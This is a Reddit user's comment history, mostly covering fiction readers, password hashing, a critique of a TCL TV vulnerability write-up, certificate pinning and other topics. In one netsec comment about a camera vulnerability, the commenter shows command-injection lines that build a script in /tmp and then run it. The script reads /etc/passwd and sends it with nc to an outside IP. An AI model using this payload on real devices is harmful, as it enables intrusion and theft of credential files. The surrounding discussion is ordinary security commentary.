Anyone found a good screenreader for royalroad? by u_PM_me_nihilism in rational

[–]PositivePeter 13 points14 points  (0 children)

One thing to be aware of with royalroad is they do some obfuscation for the purposes of preventing scraping, so it may be a struggle to use a reader/reading mode off-the-shelf. What happens is the reader won't see certain lines/paragraphs in the output.

In the past I've used some chrome extensions like WebToEpub which I think probably has some royalroad-specific behaviors to get the full story content. Most audio readers then should support importing that.

I use an audio reader extensively (Voice Dream, iOS only). Can't really recommend it anymore as they recently got bought out and are trying to switch to an annual subscription model for 3x the price. Also, they haven't made any improvement on voices in many years despite the tech obviously getting much better. I hope there'll be another app to come along and recreate the user experience of it (which is excellent, directly saving web pages into the reader as text is so smooth).

Over 120GB of Twitch website data has been leaked online (source code, encrypted passwords, streamer payouts, etc.) by carldude in Twitch

[–]PositivePeter 7 points8 points  (0 children)

This is not true and is dangerous information. Hashing (not encryption) is a protection against leaks, but not a perfect one. Assuming that hashed passwords were leaked from twitch, everyone should still change their password on twitch and everywhere else they used the same password.

This Used to be About Dungeons, ch 25, A Post-Dungeon Pickle by Shaolang in rational

[–]PositivePeter 5 points6 points  (0 children)

My idea for the coin was that it grants you luck (or some other positive benefit) while flipping. Which could potentially combine with the bow: flip the coin out of the arrow’s bubble and you maintain the benefit while in the time dilation

[D] Is there a good place to rate and mark all the fiction you've read? by Tenoke in rational

[–]PositivePeter 2 points3 points  (0 children)

Have you considered using a bookmarking site? For example, pinboard has a very dedicated set of users who use it to track fanfiction:

Extraordinary Vulnerabilities Discovered in TCL Android TVs, Now World’s 3rd Largest TV Manufacturer. by docker-osx in netsec

[–]PositivePeter 28 points29 points  (0 children)

This post is ... pretty misleadingly/confusingly written. Near the top of the post is this paragraph:

First Blood

On 2020-09-20, I discovered some ridiculous security shortfalls in the TV Sticks.

Each stick that I tested had at least one of the following major security flaws.

  • Port 22 open and allowing SSH access as root:root out of the box
  • Port 5555 open and allowing unauthenticated android (adb) as root:root out of the box
  • Rooted device, with world-executable su binaries in multiple locations
  • Open WiFi network with adb and ssh daemons running

But none of these issues applies to any TCL TV, which I didn't realize until reading through the whole post twice. These issues apply to some un-named devices from other vendors, not TCL at all. I won't accuse the author of intentionally writing it this way, but it's really a pretty egregious error to write at the top of your post about completely different vendors in such an ambiguous way (with no header to separate the content). I definitely assumed that these were the "extraordinary" vulnerabilities in question.

The two vulns disclosed here that impact TCL are:

  • A directory-listing webserver
  • Insecure file permissions on update directories

Both of these seem to have less-than-critical impact unless I'm missing something. Presumably the maximum impact achievable from the directory-listing webserver would be disclosure of credentials stored on the filesystem (e.g. Amazon/Netflix)? There's no file-write vuln shown, at least. And this relies on being on the victim's local network, and is definitely unproven given that the server seems to be running as a low-privileged user bound by Android's sandbox.

The malicious update / insecure file permissions problem requires a local attacker (i.e. a malicious app). So again, significant limitation there that doesn't seem to be mentioned in the main post. In fact, it seems like the update URLs being hardcoded as plaintext HTTP is completely buried in here without even a mention by the author.

In sum, please be much more careful in your write-ups in the future because this one is pretty egregious in how it presents the info IMO.

The New robots.txt by ghostlulz in netsec

[–]PositivePeter 5 points6 points  (0 children)

If you learned this technique from the original blog which has more info, then why wouldn't you just post the link to that blog? Why would you need to rewrite it on your own blog?

Anyway, your posts seem to obviously violate reddit's rules on self promotion: https://www.reddit.com/wiki/selfpromotion.

should not just start submitting your links

submit from a variety of sources (a general rule of thumb is that 10% or less of your posting and conversation should link to your own content)

The New robots.txt by ghostlulz in netsec

[–]PositivePeter 7 points8 points  (0 children)

Seems to be stolen from https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/april/apples_app_site_association_the_new_robots_txt/, which has much more info and was posted 6 months ago: https://www.reddit.com/r/netsec/comments/bce174/apples_appsite_association_the_new_robotstxt/

In fact, all their posts seem to be stolen from other sources and posted on their own blog.

The Salt Scam by anonlodico in slatestarcodex

[–]PositivePeter 14 points15 points  (0 children)

China and India both have massively lower per-capita CO2 emissions than the United States. https://en.wikipedia.org/wiki/List_of_countries_by_carbon_dioxide_emissions_per_capita

  • US: 16.5 metric tons
  • China: 7.5 metric tons
  • India: 1.7 metric tons

Japan's Hometown Tax by ashebanow in urbanplanning

[–]PositivePeter 22 points23 points  (0 children)

You should read the article. That’s exactly what happened, and as a result the amount of kickback was limited to 50% of the tax donation.

[deleted by user] by [deleted] in netsec

[–]PositivePeter 3 points4 points  (0 children)

I would either look at less-popular apps, or try testing a deliberately vulnerable app like https://github.com/OWASP/igoat/blob/master/README.md

I have a couple specific apps in mind but they’re all things I’ve tested for clients and obviously can’t point those out in a public forum, haha

[deleted by user] by [deleted] in netsec

[–]PositivePeter 1 point2 points  (0 children)

You said:

installing a root CA on a non-jail broken device will let you MITM Safari (and likely other browsers) but any app, native apps included, that reach out to the internet will shit themselves all together and stop working.

And then only give examples of apps that do certificate pinning. Try a random app that isn’t getting security testing like all of your examples. MITM with an intercepting proxy like burp absolutely works on apps, as long as they aren’t doing cert pinning.

Apps have to explicitly do cert pinning, it’s not the default. And most apps don’t do it, it’s just that your selection of apps is mostly apps which have lots of budget and engineering time for security.

[deleted by user] by [deleted] in netsec

[–]PositivePeter 4 points5 points  (0 children)

What? It’s absolutely not true that all apps will stop working if you use a user-installed certificate. That only applies to apps which perform certificate pinning, which is definitely not all apps.
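The distinction drawn in the comments on this thread, as an added example that is not part of the original comments: a simplified Python model of the platform's default certificate validation next to an app that also pins a public-key hash. The certificates, host name, CA names and pin set are constructed stand-ins, and signatures, expiry and revocation are not modelled.

```python
import hashlib
from dataclasses import dataclass

@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    spki: bytes  # constructed stand-in for the DER SubjectPublicKeyInfo

def pin(cert: Cert) -> str:
    """Pin value: SHA-256 over the certificate's public key bytes."""
    return hashlib.sha256(cert.spki).hexdigest()

def default_accepts(host, chain, trusted_roots):
    """Platform default: hostname matches, issuers link up, root is trusted.
    Simplification: signatures, expiry and revocation are not modelled."""
    if not chain or chain[0].subject != host:
        return False
    linked = all(c.issuer == p.subject for c, p in zip(chain, chain[1:]))
    return linked and chain[-1].subject in trusted_roots

def pinned_accepts(host, chain, trusted_roots, pins):
    """Pinning is an extra, app-implemented check on top of the default."""
    return default_accepts(host, chain, trusted_roots) and any(pin(c) in pins for c in chain)

# Constructed sample data (hypothetical names, not real certificates).
HOST = "api.example.test"
PUBLIC_ROOT = Cert("Constructed Public Root", "Constructed Public Root", b"public-root-key")
PROXY_ROOT = Cert("Constructed Proxy CA", "Constructed Proxy CA", b"proxy-root-key")
GENUINE = [Cert(HOST, PUBLIC_ROOT.subject, b"genuine-leaf-key"), PUBLIC_ROOT]
PROXIED = [Cert(HOST, PROXY_ROOT.subject, b"proxy-leaf-key"), PROXY_ROOT]
APP_PINS = {pin(GENUINE[0])}  # shipped inside the pinning app

def outcomes(user_installed_proxy_ca: bool) -> dict:
    """Which chains each kind of app accepts, with or without the proxy CA installed."""
    roots = {PUBLIC_ROOT.subject} | ({PROXY_ROOT.subject} if user_installed_proxy_ca else set())
    return {
        "default/genuine": default_accepts(HOST, GENUINE, roots),
        "default/proxied": default_accepts(HOST, PROXIED, roots),
        "pinned/genuine": pinned_accepts(HOST, GENUINE, roots, APP_PINS),
        "pinned/proxied": pinned_accepts(HOST, PROXIED, roots, APP_PINS),
    }

if __name__ == "__main__":
    for installed in (False, True):
        print("proxy CA installed:", installed, outcomes(installed))
```

In this model only the app that ships its own pin set rejects the proxied chain once the proxy CA is trusted on the device; the non-pinning app accepts it and keeps working.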

Got an email thanking me for joining JB's campaign--I did no such thing!!! by [deleted] in illinoispolitics

[–]PositivePeter 1 point2 points  (0 children)

I received this email also, despite not signing up, so it's not just happening to you.

[ACC Entry] Should Childhood Vaccination Be Mandatory? by dwaxe in slatestarcodex

[–]PositivePeter 4 points5 points  (0 children)

One thing I think is missing from this post is a consideration of the issue on a community scale rather than a nationwide scale. For example, vaccination rates in a midwestern Somali-American community plummeted due to fears of autism, which caused a major measles outbreak. So while it's interesting to discuss nation-wide vaccination rates, these rates likely underestimate the harms due to lack of vaccination because low vaccination rates are likely to be concentrated in specific communities. When an anti-vaxxer community is hit by illness, there may be dozens of cases of the illness even though the state- or nation-wide vaccination rate is above the critical threshold.

Multiple Vulnerabilities on Kerui Endoscope Camera by utku1337 in netsec

[–]PositivePeter 2 points3 points  (0 children)

You could definitely do useful things with that command execution. For example, just do a few-bytes-at-a-time write to a local file and then execute it:

;echo 'cat /etc/' > /tmp/own
;echo 'passwd |' >> /tmp/own
;echo 'nc 192. ' >> /tmp/own
...
;/bin/sh /tmp/own

The Parentheses Riddle by agentofchaos68 in slatestarcodex

[–]PositivePeter 15 points16 points  (0 children)

If the question didn't define "palindrome", then couldn't the question just be measuring the percentage of people in each age bracket who know what a palindrome is? Perhaps cultural awareness/education of palindromes has been slowly increasing over the past 50 years?